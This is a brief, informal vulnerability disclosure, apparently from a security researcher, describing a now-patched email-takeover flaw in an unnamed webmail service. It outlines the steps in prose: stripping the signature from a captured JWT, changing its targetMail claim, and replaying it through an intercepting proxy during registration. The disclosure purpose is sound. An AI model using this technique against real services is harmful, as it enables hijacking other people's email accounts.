disclosure #2 - email takeover

scheduled to be released nov 4th 2025.

i was advised to not share the name of the service for reasons i shant explain (iykyk)

as a broad summary:

a replay attack allows an attacker to first craete a legitimate email account, capture a 'fingerprint-auth' from the request, modify it such that the jwt in it is unsigned, and change the targetMail payload in said jwt to the email it wants to take over and remove the signature, pause the current registration through a proxy like mitmproxy or burp suite, create a new account with the new auth payload and successfully hijack an email from it. in summary, this allows an attacker to take over any email address in said webmail. this issue has been patched a month ago.